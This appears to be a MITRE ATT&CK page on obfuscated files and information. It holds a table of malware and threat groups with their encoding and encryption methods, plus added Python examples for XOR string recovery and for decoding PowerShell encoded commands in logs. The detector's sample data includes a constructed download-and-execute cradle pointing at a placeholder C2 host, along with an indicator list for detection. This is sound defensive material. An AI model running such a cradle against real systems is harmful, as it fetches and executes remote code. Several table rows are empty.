Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password-protected compressed/encrypted file that was provided by the adversary.[1] Adversaries may also use compressed or archived scripts, such as JavaScript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.[2] Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.[3]
Adversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language-specific semantics can be used to evade signature-based detections and application control mechanisms.[4][5][6]
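Single-byte XOR over embedded strings and configuration blobs is the string-hiding scheme cited most often in the procedure examples on this page, and it defeats a plain `strings` pass because the hidden text never appears in the clear. The analyst-side recovery routine below is an added example, not MITRE's code or that of any of the listed tools: it tries every key, ranks the candidates by printability and English letter frequency, and generalises to a repeating multi-byte key by splitting the blob into one stream per key byte. The sample configuration string, the key values and the frequency weights are constructed for illustration.

```python
"""Recover plain-text strings hidden behind single-byte or repeating-key XOR.

Added example for analysts; the sample blob and keys below are constructed.
"""
import re
import string

# Printable ASCII (tab/newline/CR included, vertical tab and form feed excluded)
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}

# Approximate English letter frequencies (percent); space is by far the most common byte
ENGLISH_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 0.98, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.074, " ": 13.0,
}


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats every len(key) bytes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def score_plaintext(candidate: bytes) -> float:
    """Higher is more text-like. Printability dominates; letter frequency breaks ties.

    Printability alone is not enough: for text that is mostly lowercase letters,
    many wrong keys still yield printable garbage, so the frequency term matters.
    """
    n = len(candidate)
    if n == 0:
        return 0.0
    printable = sum(b in PRINTABLE for b in candidate) / n
    english = sum(ENGLISH_FREQ.get(chr(b).lower(), 0.0) for b in candidate) / n
    return printable * 100 + english


def recover_single_byte_xor(blob: bytes):
    """Try all 256 keys; return (key, plaintext, score) of the best-scoring candidate."""
    ranked = sorted(
        ((score_plaintext(xor_repeating(blob, bytes([k]))), k) for k in range(256)),
        reverse=True,
    )
    best_score, key = ranked[0]
    return key, xor_repeating(blob, bytes([key])), best_score


def recover_repeating_xor(blob: bytes, key_len: int):
    """Generalisation: key byte i only touches positions i, i+key_len, i+2*key_len, ...

    so each stream is an independent single-byte problem. Returns (key, plaintext).
    """
    key = bytes(recover_single_byte_xor(blob[i::key_len])[0] for i in range(key_len))
    return key, xor_repeating(blob, key)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII, as a `strings`-style pass over decoded data."""
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % min_len, data)]


# Constructed sample: a fictitious config string hidden with key 0x53
SAMPLE_PLAINTEXT = (
    b"the c2 server address is https://c2.example.invalid/beacon "
    b"and the sleep interval is 60 seconds"
)
SAMPLE_KEY = 0x53
SAMPLE_BLOB = xor_repeating(SAMPLE_PLAINTEXT, bytes([SAMPLE_KEY]))

if __name__ == "__main__":
    key, plain, score = recover_single_byte_xor(SAMPLE_BLOB)
    print(f"key=0x{key:02x} score={score:.1f}")
    for s in extract_strings(plain):
        print("  ", s)
```

Run over a real sample, the interesting output is the list of recovered strings (C2 hosts, mutex names, API names), which can then feed signatures and hunting queries. Note what the routine does not do: a scheme that skips bytes equal to the key or to zero (as described for Dust Storm below) or a multi-layer stack such as Base64 over XOR needs the corresponding decode step applied first.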
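Command obfuscation of the kind described above is usually caught not on the raw command line but on what it decodes to. The detection logic below is an added example, not MITRE's code or that of any tool on this page: it pulls `-EncodedCommand` arguments (Base64 over UTF-16LE, the encoding PowerShell expects) out of constructed Windows process-creation log lines, peels one nested `FromBase64String` layer, and flags download-and-execute indicators in the decoded text. The log lines, the script bodies, the `c2.example.invalid` host and the indicator list are all constructed for illustration.

```python
"""Decode and triage -EncodedCommand arguments in process-creation log lines.

Added example; the log lines, scripts and indicator list are constructed.
"""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...),
# so matching only the full switch name misses most real invocations.
ENCODED_ARG = re.compile(
    r"(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE
)

# Nested literal: [Convert]::FromBase64String('...')
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Constructed indicator list; tune to your environment
INDICATORS = (
    "Invoke-Expression", "IEX", "DownloadString", "DownloadFile", "Net.WebClient",
    "Invoke-WebRequest", "FromBase64String", "Start-Process", "-join", "[char]",
)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(token: str) -> Optional[str]:
    """Reverse encode_powershell; None if the token is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def peel_layers(script: str, max_depth: int = 3) -> list:
    """Follow nested FromBase64String('...') literals; returns every decoded layer."""
    layers = [script]
    for _ in range(max_depth):
        m = NESTED_B64.search(layers[-1])
        if not m:
            break
        try:
            inner = base64.b64decode(m.group(1), validate=True)
            # Unicode.GetString means UTF-16LE; otherwise assume UTF-8/ASCII
            enc = "utf-16-le" if "Unicode.GetString" in layers[-1] else "utf-8"
            layers.append(inner.decode(enc))
        except (ValueError, UnicodeDecodeError):
            break
    return layers


def analyze_log(lines) -> list:
    """One finding per decodable encoded argument, with indicators seen in any layer."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in ENCODED_ARG.finditer(line):
            decoded = decode_encoded_command(m.group(1))
            if decoded is None:
                continue
            layers = peel_layers(decoded)
            haystack = "\n".join(layers).lower()
            hits = [ind for ind in INDICATORS if ind.lower() in haystack]
            findings.append({
                "line": n,
                "layers": len(layers),
                "script": layers[-1],       # innermost decoded script
                "indicators": hits,
                "suspicious": bool(hits),
            })
    return findings


# Constructed sample log: a plain script run, a benign encoded command, and a
# double-encoded download cradle pointing at a placeholder host.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/stage')"
WRAPPER = (
    "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
    + encode_powershell(CRADLE) + "')) | IEX"
)
SAMPLE_LOG = [
    'EventID=4688 CommandLine="powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"',
    'EventID=4688 CommandLine="powershell.exe -NoProfile -EncodedCommand '
    + encode_powershell("Get-Date") + '"',
    'EventID=4688 CommandLine="powershell -w hidden -ep bypass -enc '
    + encode_powershell(WRAPPER) + '"',
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f)
```

Two design points carry over to production rules: run string matches over the decoded layers rather than the raw command line, since the Base64 form of a cradle differs with every byte of padding or whitespace, and treat an encoded command that decodes to a second `FromBase64String` layer as a stronger signal than either layer alone.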
ID | Name | Description |
---|---|---|
S0045 | ADVSTORESHELL | Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.[7][8] |
S0331 | Agent Tesla | Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult.[9] Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings.[10] |
S0504 | Anchor | Anchor has obfuscated code with stack strings and string encryption.[11] |
S0584 | AppleJeus | AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.[12] |
S0622 | AppleSeed | AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.[13] |
G0099 | APT-C-36 | APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password-protected encrypted email attachments to avoid detection.[14] |
G0026 | APT18 | |
G0073 | APT19 | APT19 used Base64 to obfuscate commands and the payload.[16] |
G0007 | APT28 | APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.[8][17][18][19][20] |
G0016 | APT29 | |
G0022 | APT3 | APT3 obfuscates files or information to help evade defensive measures.[22] |
G0050 | APT32 | APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. APT32 has also encoded payloads using Base64 and a framework called "Dont-Kill-My-Cat (DKMC)". APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.[23][24][25][26][27][28][29] |
G0064 | APT33 | |
G0067 | APT37 | |
G0087 | APT39 | |
G0096 | APT41 | |
G0143 | Aquatic Panda | Aquatic Panda has encoded commands in Base64.[36] |
S0456 | Aria-body | Aria-body has used an encrypted configuration file for its loader.[37] |
S0373 | Astaroth | Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.[38][39] |
S0438 | Attor | Strings in Attor's components are encrypted with an XOR cipher using a hardcoded key, and the configuration data, log files, and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.[40] |
S0347 | AuditCred | |
S0640 | Avaddon | |
S0473 | Avenger | Avenger has the ability to XOR encrypt files to be sent to C2.[43] |
S0475 | BackConfig | BackConfig has used compressed and decimal encoded VBS scripts.[44] |
G0135 | BackdoorDiplomacy | BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.[45] |
S0534 | Bazar | Bazar has used XOR, RSA2, and RC4 encrypted files.[46][47][48] |
S0574 | BendyBear | |
S0268 | Bisonal | Bisonal's DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.[50][51] |
S0570 | BitPaymer | BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.[52] |
G0063 | BlackOasis | BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.[53] |
S0520 | BLINDINGCAN | BLINDINGCAN has obfuscated code using Base64 encoding.[54] |
G0108 | Blue Mockingbird | Blue Mockingbird has obfuscated the wallet address in the payload binary.[55] |
S0657 | BLUELIGHT | |
S0635 | BoomBox | BoomBox can encrypt data using AES prior to exfiltration.[57] |
S0415 | BOOSTWRITE | BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit initialization vector (IV) to evade detection.[58] |
S0651 | BoxCaon | BoxCaon used the "StackStrings" obfuscation technique to hide malicious functionalities.[59] |
S0482 | Bundlore | Bundlore has obfuscated data with base64, AES, RC4, and bz2.[60] |
S0030 | Carbanak | Carbanak encrypts strings to make analysis more difficult.[61] |
S0484 | Carberp | Carberp has used XOR-based encryption to mask C2 server locations within the trojan.[62] |
S0335 | Carbon | Carbon encrypts configuration files and tasks for the malware to complete using the CAST-128 algorithm.[63][64] |
S0348 | Cardinal RAT | Cardinal RAT encodes many of its artifacts and is encrypted (AES-128) when downloaded.[65] |
S0465 | CARROTBALL | CARROTBALL has used a custom base64 alphabet to decode files.[66] |
S0462 | CARROTBAT | CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.[67] |
G0114 | Chimera | |
S0667 | Chrommme | Chrommme can encrypt sections of its code to evade detection.[69] |
S0660 | Clambling | The Clambling executable has been obfuscated when dropped on a compromised host.[70] |
G0080 | Cobalt Group | Cobalt Group obfuscated several scriptlets and code used on the victim's machine, including through use of XOR and RC4.[71][72] |
S0154 | Cobalt Strike | Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.[73][74] |
S0369 | CoinTicker | CoinTicker initially downloads a hidden encoded file.[75] |
S0244 | Comnie | |
S0126 | ComRAT | ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has also embedded an XOR encrypted communications module inside the orchestrator module. ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.[77][78] |
S0608 | Conficker | Conficker has obfuscated its code to prevent its removal from host machines.[79] |
S0575 | Conti | Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.[80][81][48] |
S0492 | CookieMiner | CookieMiner has used base64 encoding to obfuscate scripts on the system.[82] |
S0137 | CORESHELL | CORESHELL obfuscates strings using a custom stream cipher.[83] |
S0046 | CozyCar | The payload of CozyCar is encrypted with simple XOR with a rotating key. The CozyCar configuration file has been encrypted with RC4 keys.[84] |
S0625 | Cuba | Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.[85] |
S0497 | Dacls | |
G0070 | Dark Caracal | Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.[87] |
G0012 | Darkhotel | Darkhotel has obfuscated code using RC4, XOR, and RSA.[88][89] |
S0673 | DarkWatchman | DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.[90] |
S0187 | Daserf | Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.[91] |
S0354 | Denis | Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64.[92][27] |
S0659 | Diavol | Diavol has Base64 encoded the RSA public key used for encrypting files.[93] |
S0213 | DOGCALL | |
S0695 | Donut | Donut can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.[95] |
S0694 | DRATzarus | |
S0384 | Dridex | |
S0502 | Drovorub | Drovorub has used XOR encrypted payloads in WebSocket client to server messages.[98] |
S0567 | Dtrack | Dtrack has used a dropper that embeds an encrypted payload as extra data.[99] |
G0031 | Dust Storm | Dust Storm has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.[100] |
S0062 | DustySky | The DustySky dropper uses a function to obfuscate the name of functions and other parts of the malware.[101] |
S0377 | Ebury | Ebury has obfuscated its strings with a simple XOR encryption with a static key.[102] |
S0593 | ECCENTRICBANDWAGON | ECCENTRICBANDWAGON has encrypted strings with RC4.[103] |
S0624 | Ecipekac | Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.[104] |
S0605 | EKANS | |
G0066 | Elderwood | Elderwood has encrypted documents and malicious executables.[106] |
S0081 | Elise | Elise encrypts several of its files, including configuration files.[107] |
S0082 | Emissary | Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.[108][109] |
S0367 | Emotet | Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts.[110][111][112][113] |
S0363 | Empire | Empire has the ability to obfuscate commands using |
S0634 | EnvyScout | |
S0091 | Epic | Epic heavily obfuscates its code to make analysis more difficult.[115] |
S0401 | Exaramel for Linux | Exaramel for Linux uses RC4 for encrypting the configuration.[116][117] |
S0512 | FatDuke | FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.[118] |
S0267 | FELIXROOT | FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.[119][120] |
G0037 | FIN6 | |
G0046 | FIN7 | FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.[4][122][123] |
G0061 | FIN8 | FIN8 has used environment variables and standard input (stdin) to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads.[4][124][125] |
S0355 | Final1stspy | Final1stspy obfuscates strings with base64 encoding.[94] |
S0182 | FinFisher | FinFisher is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.[126][127] |
S0618 | FIVEHANDS | The FIVEHANDS payload is encrypted with AES-128.[128][129][130] |
S0696 | Flagpro | Flagpro has been delivered within ZIP or RAR password-protected archived files.[131] |
S0383 | FlawedGrace | FlawedGrace encrypts its C2 configuration files with AES in CBC mode.[132] |
S0661 | FoggyWeb | |
G0117 | Fox Kitten | Fox Kitten has base64 encoded scripts and payloads to avoid detection.[134] |
G0101 | Frankenstein | Frankenstein has run encoded commands from the command line.[135] |
S0277 | FruitFly | |
S0410 | Fysbis | |
G0093 | GALLIUM | GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.[138] |
G0084 | Gallmaker | |
G0047 | Gamaredon Group | Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.[140][141][142][143][144] |
S0168 | Gazer | Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.[145] |
S0666 | Gelsemium | |
G0115 | GOLD SOUTHFIELD | GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.[146] |
S0493 | GoldenSpy | GoldenSpy's uninstaller has base64-encoded its variables.[147] |
S0588 | GoldMax | GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.[148][149] |
S0477 | Goopy | Goopy's decrypter has been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.[27] |
S0531 | Grandoreiro | The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.[39][150] |
S0237 | GravityRAT | GravityRAT supports file encryption (AES with the key "lolomycin2017").[151] |
S0690 | Green Lambert | Green Lambert has encrypted strings.[152][153] |
S0342 | GreyEnergy | GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.[120] |
S0632 | GrimAgent | GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.[154] |
G0043 | Group5 | Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.[155] |
S0132 | H1N1 | H1N1 uses multiple techniques to obfuscate strings, including XOR.[156] |
S0499 | Hancitor | Hancitor has used Base64 to encode malicious links. Hancitor has also delivered compressed payloads in ZIP files to victims.[157][158] |
S0391 | HAWKBALL | HAWKBALL has encrypted the payload with an XOR-based algorithm.[159] |
S0170 | Helminth | |
S0697 | HermeticWiper | HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.[161][162][163] |
S0698 | HermeticWizard | HermeticWizard has the ability to encrypt PE files with a reverse XOR loop.[164] |
S0087 | Hi-Zor | Hi-Zor uses various XOR techniques to obfuscate its components.[165] |
S0394 | HiddenWasp | HiddenWasp encrypts its configuration and payload.[166] |
G0126 | Higaisa | |
S0601 | Hildegard | |
S0232 | HOMEFRY | |
G0072 | Honeybee | |
S0431 | HotCroissant | HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.[172] |
S0070 | HTTPBrowser | HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.[173] |
S0203 | Hydraq | Hydraq uses basic obfuscation in the form of spaghetti code.[106][174] |
S0398 | HyperBro | HyperBro can be delivered encrypted to a compromised host.[70] |
S0483 | IcedID | IcedID has utilized encrypted binaries and base64 encoded strings.[175] |
S0434 | Imminent Monitor | Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.[14] |
G0100 | Inception | Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.[176] |
S0604 | Industroyer | Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.[177] |
S0259 | InnaputRAT | InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.[178] |
S0260 | InvisiMole | InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.[179][180] |
S0231 | Invoke-PSImage | Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.[181] |
S0581 | IronNetInjector | IronNetInjector can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.[182] |
S0189 | ISMInjector | ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.[183] |
S0044 | JHUHUGIT | Many strings in JHUHUGIT are obfuscated with an XOR algorithm.[184][185][19] |
S0201 | JPIN | JPIN uses an encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.[186] |
S0283 | jRAT | jRAT's Java payload is encrypted with AES.[187] Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.[188] |
S0265 | Kazuar | Kazuar is obfuscated using the open source ConfuserEx protector. Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.[189] |
G0004 | Ke3chang | |
S0585 | Kerrdown | Kerrdown can encrypt, encode, and compress multiple layers of shellcode.[191] |
S0487 | Kessel | Kessel's configuration is hardcoded and RC4 encrypted within the binary.[192] |
S0387 | KeyBoy | In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.[193] |
S0526 | KGH_SPY | |
S0607 | KillDisk | KillDisk uses VMProtect to make reverse engineering the malware more difficult.[195] |
G0094 | Kimsuky | Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding.[196][197] Kimsuky has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.[198] |
S0641 | Kobalos | Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call.[199] |
S0669 | KOCTOPUS | KOCTOPUS has obfuscated scripts with the BatchEncryption tool.[200] |
S0356 | KONNI | KONNI is heavily obfuscated and includes encrypted configuration files.[201] |
S0236 | Kwampirs | Kwampirs downloads additional files that are base64-encoded and encrypted with another cipher.[202] |
G0032 | Lazarus Group | Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.[203][204][205][206][86][207][208][209][96][210][211] |
G0140 | LazyScripter | LazyScripter has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques.[200] |
G0077 | Leafminer | Leafminer obfuscated scripts that were used on victim machines.[212] |
G0065 | Leviathan | Leviathan has obfuscated code using base64 and gzip compression.[213] |
S0395 | LightNeuron | LightNeuron encrypts its configuration files with AES-256.[214] |
S0447 | Lokibot | |
S0451 | LoudMiner | LoudMiner has obfuscated various scripts and encrypted DMG files.[216] |
S0409 | Machete | Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.[217][218] |
G0059 | Magic Hound | Magic Hound malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.[219] |
S0167 | Matryoshka | Matryoshka obfuscates API function names using a substitute cipher combined with Base64 encoding.[220] |
S0449 | Maze | Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.[221] |
S0500 | MCMD | MCMD can Base64 encode output strings prior to sending to C2.[222] |
G0045 | menuPass | menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.[223][224][225] |
S0455 | Metamorfo | |
S0339 | Micropsia | Micropsia obfuscates the configuration with a custom Base64 and XOR.[228][229] |
S0051 | MiniDuke | MiniDuke can use control flow flattening to obscure code.[118] |
G0103 | Mofang | Mofang has compressed the ShimRat executable within malicious email attachments. Mofang has also encrypted payloads before they are downloaded to victims.[230] |
G0021 | Molerats | Molerats has delivered compressed executables within ZIP files to victims.[231] |
S0284 | More_eggs | More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.[232] |
S0256 | Mosquito | Mosquito's installer is obfuscated with a custom crypter.[233] |
G0069 | MuddyWater | MuddyWater has used Daniel Bohannon's Invoke-Obfuscation framework and obfuscated PowerShell scripts.[234][24] The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.[234][235][236][237][238][239] |
G0129 | Mustang Panda | Mustang Panda has delivered initial payloads hidden using archives and encoding measures.[240][241][242][243][244][245] |
S0228 | NanHaiShu | |
S0336 | NanoCore | NanoCore's plugins were obfuscated with Eazfuscator.NET 3.3.[247] |
S0457 | Netwalker | Netwalker's PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. Netwalker's DLL has also been embedded within the PowerShell script in hex format.[248][249] |
S0198 | NETWIRE | NETWIRE has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.[250] |
G0014 | Night Dragon | A Night Dragon DLL included an XOR-encoded section.[251] |
S0385 | njRAT | |
S0353 | NOKKI | |
G0049 | OilRig | OilRig has encrypted and encoded data in its malware, including by using base64.[254][255][256][257][258] |
S0138 | OLDBAIT | OLDBAIT obfuscates internal strings and unpacks them at startup.[83] |
S0264 | OopsIE | OopsIE uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. OopsIE also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.[259][260] |
G0116 | Operation Wocao | Operation Wocao has executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.[261] |
S0229 | Orz | Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.[213] |
S0352 | OSX_OCEANLOTUS.D | OSX_OCEANLOTUS.D encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.[262] |
S0594 | Out1 | |
S0598 | P.A.S. Webshell | P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.[117] |
S0664 | Pandora | Pandora has the ability to compress strings with QuickLZ.[263] |
G0040 | Patchwork | Patchwork has obfuscated a script with Crypto Obfuscator.[264] |
S0587 | Penquin | Penquin has encrypted strings in the binary for obfuscation.[265] |
S0517 | Pillowmint | Pillowmint has been compressed and stored within a registry key. Pillowmint has also obfuscated the AES key used for encryption.[266] |
S0501 | PipeMon | |
S0124 | Pisloader | Pisloader obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.[268] |
S0013 | PlugX | PlugX can use API hashing and modify the names of strings to evade detection.[70][245] |
S0428 | PoetRAT | PoetRAT has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.[269][270] |
S0012 | PoisonIvy | PoisonIvy hides any strings related to its own indicators of compromise.[271] |
S0518 | PolyglotDuke | PolyglotDuke can custom encrypt strings.[118] |
S0453 | Pony | Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.[272] |
S0150 | POSHSPY | POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.[273] |
S0685 | PowerPunch | PowerPunch can use Base64-encoded scripts.[143] |
S0194 | PowerSploit | PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.[274][275] |
S0393 | PowerStallion | PowerStallion uses an XOR cipher to encrypt command output written to its OneDrive C2 server.[276] |
S0223 | POWERSTATS | POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob.[235][277] POWERSTATS has used PowerShell code with custom string obfuscation.[278] |
S0113 | Prikormka | Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.[279] |
S0613 | PS1 | PS1 is distributed as a set of encrypted files and scripts.[280] |
S0147 | Pteranodon | Pteranodon can use a dynamic Windows hashing algorithm to map API components.[143] |
S0196 | PUNCHBUGGY | PUNCHBUGGY has hashed most of its code's functions and encrypted payloads with base64 and XOR.[281] |
S0197 | PUNCHTRACK | PUNCHTRACK is loaded and executed by a highly obfuscated launcher.[282] |
G0024 | Putter Panda | Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.[283] |
S0650 | QakBot | QakBot can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.[284] |
S0269 | QUADAGENT | QUADAGENT was likely obfuscated using Invoke-Obfuscation.[255][24] |
S0565 | Raindrop | Raindrop encrypted its payload using a simple XOR algorithm with a single-byte key.[285][286] |
S0629 | RainyDay | |
S0458 | Ramsay | Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.[288] |
S0662 | RCSession | RCSession can compress and obfuscate its strings to evade detection on a compromised host.[70] |
S0172 | Reaver | |
S0153 | RedLeaves | A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.[290] |
S0511 | RegDuke | RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.[118] |
S0332 | Remcos | Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths.[291] |
S0375 | Remexi | |
S0125 | Remsec | Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.[293][294] |
S0496 | REvil | REvil has used encrypted strings and configuration files.[295][296][297][298][299][300][301] |
S0433 | Rifdoor | Rifdoor has encrypted strings with a single byte XOR algorithm.[172] |
S0448 | Rising Sun | Configuration data used by Rising Sun is encrypted using RC4.[302] |
G0106 | Rocke | Rocke has modified UPX headers after packing files to break unpackers.[303] |
S0270 | RogueRobin | The PowerShell script with the RogueRobin payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.[304][24] |
S0240 | ROKRAT | ROKRAT can encrypt data prior to exfiltration by using an RSA public key.[33][305] |
S0148 | RTM | RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.[306][307] |
S0446 | Ryuk | Ryuk can use anti-disassembly and code transformation obfuscation techniques.[48] |
